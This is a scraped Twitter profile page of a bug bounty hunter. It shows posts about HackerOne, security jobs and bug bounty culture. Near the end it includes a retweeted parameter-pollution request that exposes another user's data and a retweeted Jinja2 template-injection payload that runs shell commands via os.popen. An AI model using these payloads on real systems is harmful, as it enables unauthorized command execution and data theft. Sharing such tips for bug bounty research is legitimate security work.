kpixaba
959 posts
kpixaba
@kpixaba_bsb
In the end, I became the guy my parents used to warn me about. Hacking, Shooting, Brewing Beer and Riding old Jeeps! Opinions are my own.
Florianopolis Katılım Ekim 2009
414 Takip Edilen381 Takipçiler
@NahamSec @Hacker0x01 We will miss you mate! I’ll be cheering for you on your future adventure!
English
This Friday is my last day at @Hacker0x01. The last 6 years were have been incredible. I learned a lot of valuable lessons and met a ton of amazing people.
To celebrate I wanted to share the 6 things I learned from my time at h1.
nahamsec.com/posts/6-valuab…
English
Post a picture that YOU took, use no description, and bring some Zen to the timeline.
🧘♂️
English
kpixaba retweetledi
Lord give me the confidence of a hacker who just found their first server banner disclosure and already added “InfoSec expert” to their LinkedIn.
English
Não apenas no U.S. No BR também...
Patrik Grobshäuser@ITSecurityguard
We are hiring U.S. 🇺🇸 Security Analysts for the Triage Team at @Hacker0x01! 100% remote DM me if you have any questions Submit your Application on the link below 👇 jobs.lever.co/hackerone/5564… #infosec #bugbountytips #infosecjobs RT would be appreciated ♻️❤️
Português
kpixaba retweetledi
$50,000 @Apple RCE technical write up by @rootxharsh and @iamnoooob - github.com/httpvoid/write… - probably will have a CVE assigned for the underlying issue with Lucee. Very nice bug! 🔐
English
Awesome!
Jobert Abma@jobertabma
I found a Windows only path traversal in OpenSSL s_server: hackerone.com/reports/850775. It's uncommon for OpenSSL s_server to run this configuration on the web, but a nice little find regardless. h/t to @kpixaba_bsb who helped me out to reproduce this since I don't have MS Windows!
English
kpixaba retweetledi
I didn't get a bug in, but I'm one of three winners of the meme bonus for #h12010 open. That has to be just as prestigious as the Most Valuable Hacker award, right? Thanks @TheParanoids and @Hacker0x01!
English
kpixaba retweetledi
Success in anything in life doesn't happen overnight and this is especially true for bug bounty. Posts where people are making $10k+ on a single bug is intimidating/exciting but the reality is what you're seeing is the end result of years of hard work to get to that skill level.
English
kpixaba retweetledi
HackerOne is hiring Security Analysts in the US
Things you should add to your CV/Resume:
+ Your Bug Bounty Profile(s)
+ CVEs
+ Research / Papers
+ Blogposts
+ Github Repositories
+ Open Source contribution
See you in the practical interviews! 😉
jobs.lever.co/hackerone/8747…
English
kpixaba retweetledi
ysoserial.net v1.33 released with a ton of new features. Thanks to @irsdl for the great PRs! You can see whats new here mdsec.co.uk/2020/04/introd…
English
kpixaba retweetledi
/api/v1/users/profile?id=MYID -> HTTP 200 with my data
/api/v1/users/profile?id=ANOTHERUSERID -> HTTP 401
/api/v1/users/profile?id=MYID&id=ANOTHERUSERID -> HTTP 200 with my data and the other user's data 👀
Crit bounty awarded #bugbountytips #bugbounty @Hacker0x01
GIF
English
kpixaba retweetledi
kpixaba retweetledi
kpixaba retweetledi
I improved the #PayloadAllTheThings Jinja2 SSTI command execution payload.
/?cmd={% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}&input=ls
English
kpixaba retweetledi
kpixaba retweetledi
